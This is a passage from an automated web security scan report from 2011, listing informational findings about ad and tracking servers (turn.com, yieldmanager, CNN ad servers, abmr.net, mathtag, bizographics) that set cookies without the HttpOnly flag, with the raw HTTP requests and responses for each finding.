Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.2
Date: Mon, 15 Aug 2011 18:55:55 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.6
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Set-Cookie: mediagra:13=S7QysqoutjK2UirOTFGyzrQyMjS2BvOT80rAfOtaAA%3D%3D; path=/
Content-Length: 838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>xHamster's banner systems</title><script language='javascrip
...[SNIP]...

8.9. http://ad.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=1&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=MMbe9F8c4vIW12sLi2dyci4DUN53kixla9Hhjy6Hzs_faqaDzVRu9ZiuBStYaftYXKB5GtYFP05Zh2SBlosu53bZWjGN2gF2ncsnwOMOSJtfhxpxCVZWo-G8JZeL2-AGEoXq-gPE5Ffs4A1KWdSJ3Xy4T1NZSHp0kR7yTyJ9_irGpAX7uMSqUeH6p4KGvUSZUq7OWife1h2M6Ewfw7GonRDoQNluocXO_kLxCO03TeEqGbRc_WXZLv6_wjPrFYWkRzoy0KsqvLYpwqlgKHkKO7v2cs61vb5d-EUL-mztoUL_BJuqMxnf5kZ4bjzPPBBZl4sOJ1mrC2iEDyk-G34KEYEk4UmX8i4vUYPBL0RbR7ivEzlzFI00MzI2gY6ItzbVOxkr-OO3w_o38FzKCKQ6Lm18jlcUKTrHAgecQO0u_glplHkENwT_vdM5uigT02Pno0_YmxEDTDUEKIRIqGJPfQHDMdsELscQY0iJG8ZU5Ty4GWWGARMuC9OfaFsrmvfxq63JmDsLJ-8CJbf3hY5BZTnskYqZuO4nCGPJTpDqDm8qnTQbufGXlJIhj71lBYrfro1Hb-oXI0uLH1BPomVksC8KUj7e-F2aqqZc87ofCVk5wAQqn5t3ldANs6bZF2YSHOwEyK_UcWlZltoKH3xiIIu2yhXmnBsviwnJ85Ed5aDevF_SkTMMXcVeFMc5tN7pEoXq-gPE5Ffs4A1KWdSJ3Q4zLI5CWlqCgjtHPoLh-sXGpAX7uMSqUeH6p4KGvUSZHjMTXkaAxWETmff6p0CCynXm2SuS6NlYI5OxjuXgTRgqGbRc_WXZLv6_wjPrFYWkMvMzV1KQ715fKlLs1_1zzbv2cs61vb5d-EUL-mztoULKnruFIQYKaPiMC6W5UbDg9o6CAsQCwtFM5Y7fkjHOf4Ek4UmX8i4vUYPBL0RbR7j4K5R2t8-fqw2RIN4cjypIOxkr-OO3w_o38FzKCKQ6Lm9OMIDolQH9GFZKykykhOdYuuYQv45PXfKbyz1md1g8UsEbRg4Tfn8hxcnJGDABTDQg-QbKO_N-vuvZwJz7zYy4GWWGARMuC9OfaFsrmvfx0H_cdrflarr8ERICfjtlnMaI-JJ-NoWyQaFab98q1_Zde4x4nJg09oak0s1lJ4ym7ev_sVYKpHwxGAloIhjxMC8KUj7e-F2aqqZc87ofCVmnzve-Elt6O9TGUTxKZTBDxZ1J_E_O522Ye9lt1xgY0vLOThBfDZko64vFQpO0eVCqoq3BB-vp9ASgk-DDEv5NEoXq-gPE5Ffs4A1KWdSJ3YkYFaBQ79ulBTTMuVNwWn3GpAX7uMSqUeH6p4KGvUSZ3RVmoAwX5pfOPJTb-2FpLb7Z-GfN3yPWx-jWv5rm4mEqGbRc_WXZLv6_wjPrFYWkyKtTKK2UqCBv6H_FflpgYCoZtFz9Zdku_r_CM-sVhaS0nQLPgJd6gPto5vjI1Iutu_ZyzrW9vl34RQv6bO2hQjR2INxqcXhOvUTMwnimoVBQpW6dPdstvKpYA_5893LwgSThSZfyLi9Rg8EvRFtHuFTmVUFnn6bwcz39Ym9oMKo7GSv447fD-jfwXMoIpDou0ugi34ufxqKqsc2Mtte3vDgsGMLzbiZOc-I9zjgk_f5CTby2R7XeohKUqfT7N4kH74DpXFuxI1x9y7A3NcO-1bgZZYYBEy4L059oWyua9_EGuwwMAO-MRya4QZsSn3WqHZgbJN9gHWpQZmXYTZVCh268txBWlhf05t9RfUxfrO34VPOmHtYwp1RxCIl5yWqeLwpSPt74XZqqplzzuh8JWX8dvgjNu-gFIbxMLQKtBeIkehFMwCZGLm7BQMVlkV7KMHND2CdcMnagwF9Vx8tumZRJ3v98564jan5uyPa9LugSher6A8TkV-zgDUpZ1Ind6uHY3YR3riZA9dOzPsOrYMakBfu4xKpR4fqngoa9RJmO-wf97hezQkM4wyW5i
Q-RwGxxKFq0JdDSCdP6YGujVioZtFz9Zdku_r_CM-sVhaSQsI4YtVNSaSHRo1z9-PfFu_ZyzrW9vl34RQv6bO2hQkroMkUaOOyDc-lCYw8p-jSqRRyCZjuk9zFxsj37s0Fl_4mvLB_-8Y5Oms5Uqh6HCnJ-BDkP0Hb-ZaXldXPIHPA7GSv447fD-jfwXMoIpDouZbh2dC73BhWw8_b5-6kKe4AFC-iivcKjHCCWpb_i39hSwRtGDhN-fyHFyckYMAFMTOpPWKF2Ax6b7rOHxcXUA7gZZYYBEy4L059oWyua9_H8iF8HDsCRa-9-pUq8YCKwIu4nZMWVWrFcRDFtuQymYUD1RI5tHbziFyffCyec3xFVtvCxutmhKQqI4rynX8EbVOORQ_Ko6kwNCBF1JosDuIx-MGxw6860Zgp9LuiZKfd1THLpKtTKl9Hy-9LIdrTwPkUCHIDocT4HwntaBwSiXVmGe8cmYxtGs87jVjdcUhR6Tm5A3Jl0kkCygktzwY_P2nBq1MLiym4M8a84WNRVyL5tM47YBQRfKyY2Al1gOQ0csSdIeEjo1eTSJN1N1te4P8bndmlf8vcwmNoTNcAkVr8qAbRUJoFNsCnHeEAnBhu_KgG0VCaBTbApx3hAJwYbvyoBtFQmgU2wKcd4QCcGGwUPlrOdmMzuy-JVRLC61VUc_XVxSdq289R16FkEIpjxHP11cUnatvPUdehZBCKY8Rz9dXFJ2rbz1HXoWQQimPE_-4For9FCpvxRN9dPDdyfl4wgPrBWlfpoT64Vvf0QcbqNueryT6Q6nKR3xMwJa0y93McaV8JWnaOstbjjF26BF-Apr4mvzveDGnJv-5a0H-QPevsbWEmzJkKeA3Bjf1Y3sUDNtNXvnuxxIfpNVPjsN7FAzbTV757scSH6TVT47DexQM201e-e7HEh-k1U-Ow3sUDNtNXvnuxxIfpNVPjsIL8XR7E1wpkwV56j-0nTlSXVNEmg3EUswsQW8uB2bCoOaoqpfRx3Z8kq8nb8bONUU_y0sy650wRcNU3FpSuXZVP8tLMuudMEXDVNxaUrl2VT_LSzLrnTBFw1TcWlK5dlU_y0sy650wRcNU3FpSuXZWmxU5qvbFVYpvnHYeM98xyM8qRGj8_sQ9Sn73gM-wC5jPKkRo_P7EPUp-94DPsAucyfOw79Fc-70_uTw3s0QiME_97mGKY6_98ewthfpB1rBP_e5himOv_fHsLYX6Qda4guCjZVrDggv46FtK20_Qz7Tuu1boe16PNcOFeNeN5C-07rtW6HtejzXDhXjXjeQmvybiTcE5o1p8VWzBVvNto; fc=_rPwyhtVWelLo9w8DEY9_lAHjwFtIvCqbMQSJ9jL5-FWFlt1l3kRMakuAXIQEbJ_NS-bcQhrOad4QJ1GnWK2ezeoq1NiKoT_dgJhMqoQ2e-iZpdh_q1bBpHenL6WAlOydHJF1CbuvE8l0lnSvDlQbUGQ3KO8-Xa4sNWyeZuC_Jo; pf=didDAAwXT27__r8LS9I2zEDxpSfL7IM1u56Bwn-p5lIbT6x9-XWYSjdy1isJgNTBqQxXSeAmQm9ZpwC4nbV5xMWPSU-hLNIcjpFuaPM_j1j1XJ-dEQgnYOgQTFPo1-eM9SDRceAzeZk52c4DamEdg7XFKT7txTFzsq66plXaF8wy-s2FUWUfxjDJSsUchQ9wueBMXqZax6H_I76jdSqObugcyKCm2M0l5XO-Qzx43cg6tYdo2m7e8Gc41LCSpWYs0RM0bon_RXV1dcM6lDF-Er25L7T9Plwhsq3bO8k4sEzMek-j2501dhLrTRU7UI1geo8cfzenAcgONGPxADQWUg; rrs=3%7C6%7C9%7C4%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C2%7C5%7C1001%7C1004; 
rds=15195%7C15195%7C15195%7C15201%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15197%7C15195%7C15195%7C15195%7C15195; rv=1; uid=3041410246858069995

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3041410246858069995; Domain=.turn.com; Expires=Sat, 11-Feb-2012 18:26:13 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:26:12 GMT
Content-Length: 342

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3041410246858069995&rnd=4165358895193705353&fpid=1&nu=n&t=
...[SNIP]...

8.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313433976**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313433976**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313433976**;10,3,183;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26page.allowcompete%3Dyes_@26tile%3D1313434014105_@26page.allowcompete%3Dyes_@26domId%3D67962?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:47:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=25:1715:1137:106:0:53518:1313434067:L|25:1715:1138:106:0:53518:1313433994:L|33:1411:1209:100:0:52753:1312480942:L; expires=Thu, 15-Sep-2011 18:47:47 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 949

   function wsod_image1715() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598
...[SNIP]...

8.11. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1020322&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/display.html?cl=ca-aj-cat&ch=&ty=image%2Cflash&size=300x250&kw=&hints=&target=/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1313432642380?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=a7c32506-b45f-11e0-8415-78e7d15f4cbc&_hmacv=1&_salt=1801099763&_keyid=k1&_hmac=da3cebb34c3bfe9786a2f81233b23fded95d641a; ih="b!!!!(!*<[_!!!!#=/Xr]!*<[e!!!!#=/Xr3!->h]!!!!#=0UgC!2e3%!!!!#=0V9F!3X7u!!!!#=/XrM"; bh="b!!!!D!!-?2!!!!#=/Xr,!!4e4!!!!#=/Xr.!!J>P!!!!#=0?S^!!S.q!!!!'=0`rl!!v4-!!!!#=/f,V!#%m8!!!!#=/f,V!#3,2!!!!#=01B%!#3LI!!!!#=01B%!#5m%!!!!#=0?S^!#6A+!!!!#=0?S^!#?dj!!!!%=/(S1!#?dk!!!!%=/(S1!#Qu0!!!!%=0`/r!#Sw^!!!!#=/(R/!#]%`!!!!#=/Xqt!#^d6!!!!#=/Xqt!#aO=!!!!#=.l#l!#c3y!!!!#=01B%!#m,8!!!!#=.pLS!#v?X!!!!$=/(S1!#v?_!!!!#=/(R7!#v?a!!!!#=/(S1!#xZB!!!!#=0?S^!$)7'!!!!#=01B%!$1]+!!!!#=/Xr,!$1g/!!!!#=0U==!$2iP!!!!#=0U=>!$7.'!!!!#=-=-=!$8Js!!!!#=/(R/!$8Ju!!!!#=/(R/!$8L-!!!!#=/f,V!$8L.!!!!#=/f,V"; BX=2h1vh6572dqmi&b=4&s=p2&t=219

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:24:11 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!!E!!-?2!!!!#=/Xr,!!4e4!!!!#=/Xr.!!J>P!!!!#=0?S^!!S.q!!!!'=0`rl!!v4-!!!!#=/f,V!#%m8!!!!#=/f,V!#3,2!!!!#=01B%!#3LI!!!!#=01B%!#5m%!!!!#=0?S^!#6A+!!!!#=0?S^!#?dj!!!!%=/(S1!#?dk!!!!%=/(S1!#Qu0!!!!%=0`/r!#Sw^!!!!#=/(R/!#]%`!!!!#=/Xqt!#]5h!!!!$=0`xl!#^d6!!!!#=/Xqt!#aO=!!!!#=.l#l!#c3y!!!!#=01B%!#m,8!!!!#=.pLS!#v?X!!!!$=/(S1!#v?_!!!!#=/(R7!#v?a!!!!#=/(S1!#xZB!!!!#=0?S^!$)7'!!!!#=01B%!$1]+!!!!#=/Xr,!$1g/!!!!#=0U==!$2iP!!!!#=0U=>!$7.'!!!!#=-=-=!$8Js!!!!#=/(R/!$8Ju!!!!#=/(R/!$8L-!!!!#=/f,V!$8L.!!!!#=/f,V"; path=/; expires=Wed, 14-Aug-2013 18:24:11 GMT
Set-Cookie: BX=2h1vh6572dqmi&b=4&s=p2&t=219; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 15 Aug 2011 18:24:11 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

8.12. http://ads.cnn.com/js.ng/site=cnn&cnn_pagetype=main&cnn_position=BG_Skin&cnn_rollup=homepage&page.allowcompete=no&tile=0392593343131&transactionID=1604588547342336

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /js.ng/site=cnn&cnn_pagetype=main&cnn_position=BG_Skin&cnn_rollup=homepage&page.allowcompete=no&tile=0392593343131&transactionID=1604588547342336

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=cnn&cnn_pagetype=main&cnn_position=BG_Skin&cnn_rollup=homepage&page.allowcompete=no&tile=0392593343131&transactionID=1604588547342336 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:44:58 GMT
Server: Apache
Set-Cookie: NGUserID=aa55a22-30407-167278533-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:44:58 GMT
Pragma: no-cache
Content-Length: 166
Content-Type: application/x-javascript

document.write('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\n<html>\n<body style=\"margin: 0px;\">\n<!--FlightID: 4621-->\n\n</body>\n</html>');

8.13. http://ak1.abmr.net/is/www.att.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/www.att.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.att.com?U=/global/images/priceLine_bg.gif&V=3-4L8s0Rm6Q3C9AuOk1gdnIv8A2PQHwaOlZ+ok8dvw%2fyHRXeIxaMGF7g%3d%3d&I=00E0DB608ED9193&D=www.att.com&01AD=1& HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: ak1.abmr.net

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.att.com/global/images/priceLine_bg.gif?01AD=3y_FhavpLpy0Az7sa5s6EJ9FWcy5KENbn9flUOSJPda06wv7fmLyN_A&01RI=00E0DB608ED9193&01NA=
Expires: Mon, 15 Aug 2011 18:19:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:20 GMT
Connection: close
Set-Cookie: 01AI=2-2-066CB173E87CE55F4A7D8859E3AF1B0C744E837B34AF7545AF28FE3877F0B64C-CB58ADF9AF091C2673E5D034B67A2C7B22A03B632F8D982C20B7A8EBA016C3DC; expires=Tue, 14-Aug-2012 18:19:20 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


8.14. http://ak1.abmr.net/is/www.wireless.att.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/www.wireless.att.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.wireless.att.com?U=/cell-phone-service/images/cart/en/assist_btn.gif&V=3-vko07ILw2X5GtumyuJBCSq9+YoFG+Rcn%2f92JwFgUEu4Oy7XTW5aa+hrmm5nqZoOY&I=BDE9DFECD72EBA9&D=www.wireless.att.com&01AD=1& HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Cookie: 01AI=2-2-EE34781477D09535AD10FF387FAAC647F572C92C23BB2D281248A426FB62A53C-4BCF4F156599E84DD0BD0C1E4CD6DA0DEB619F5B7B49B0CF680C44FCAD428460
Host: ak1.abmr.net

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.wireless.att.com/cell-phone-service/images/cart/en/assist_btn.gif?01AD=3yRGJWB5wDwjSCxjAiWkDg3saGZHj23T0uqcL5pHKEpNKTwsCmCB6Aw&01RI=BDE9DFECD72EBA9&01NA=
Expires: Mon, 15 Aug 2011 18:19:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:25 GMT
Connection: close
Set-Cookie: 01AI=2-2-8F6A296E59A0DC0173107E351BC754196A50B7453B506E30FCDC3A4C6F1ED425-376E9706C426CA4C4A57EF5C0F4A2583A17E3630446C70C6BFFAE04962ED14B7; expires=Tue, 14-Aug-2012 18:19:25 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


8.15. http://akamai.mathtag.com/sync/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://akamai.mathtag.com
Path:   /sync/img

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sync/img?mt_exid=10001&mt_exuid=A3106A1EF9078DAF348E74F1ECE0A7D9&rurl=4-XRXEfsHUjX79wpr90WUBHEpPFgFZ7K8LqRetMfIhMPc9HdQnCfLMr1PUFryk8nm6SGOR7Ob3F8bi38OgGeVIjYtli7qcgnMsfT+MDqksz5VSZPlHpmzEqOFjqv75w90mVwh6lHmr6mVQ49yZctOABIVbSoBQHAVVe8rvkPpfTyXBC88XF4vO1Q%3d%3d&V=3-GE6Oh0szcH0kdxBPAshRP%2frLcgS+eCOCZ8%2fTha0kfdlxBGza5HIZghKje7Yu%2fQgd HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: akamai.mathtag.com

Response

HTTP/1.1 302 Moved Temporarily
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x6806 26630
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 43
Expires: Mon, 15 Aug 2011 18:20:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:42 GMT
Connection: close
Set-Cookie: uuid=4e49637a-3b74-e247-fea7-4b3e66b6d71b; domain=.mathtag.com; path=/; expires=Tue, 14-Aug-2012 18:20:42 GMT
Set-Cookie: ts=1313432442; domain=.mathtag.com; path=/; expires=Tue, 14-Aug-2012 18:20:42 GMT
Set-Cookie: mt_mop=10001:1313432442; domain=.mathtag.com; path=/; expires=Tue, 14-Aug-2012 18:20:42 GMT
Location: http://www.wireless.att.com/store_maintenance/images/page_midSlice.gif?01RI=1946BF68A41E07A&01CM=cm:akamai.mathtag.com&01NA=ck&

GIF89a.............!.......,...........D..;

8.16. http://api.bizographics.com/v1/profile.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.json?&callback=cnnad_bizo_load_ad_callback&api_key=vuy5aqx2hg8yv997yw9e5jr4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KX2vDEYkjj68aj5XcunNcMDa7Re6IGD4lLWOSE2iimqa3Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtR5QpvePKBw6ArykBishtoVkEVUJBxdqAyD3lFIcLMteW4iiqSbERYipuWHxYXQtZCS6EipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Mon, 15 Aug 2011 18:45:36 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KWmlUlSisdmOxaj5XcunNcMDa7Re6IGD4lDIPfXzsFKUaAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQiizxJ8nJqAy5KisYO67RyvfEVUJBxdqAyCVVGcnipFb1ARYpCNxiiJkJBmAxhisg5kK3YipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 176
Connection: keep-alive

cnnad_bizo_load_ad_callback({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

8.17. http://ar.voicefive.com/b/recruitBeacon.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/recruitBeacon.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

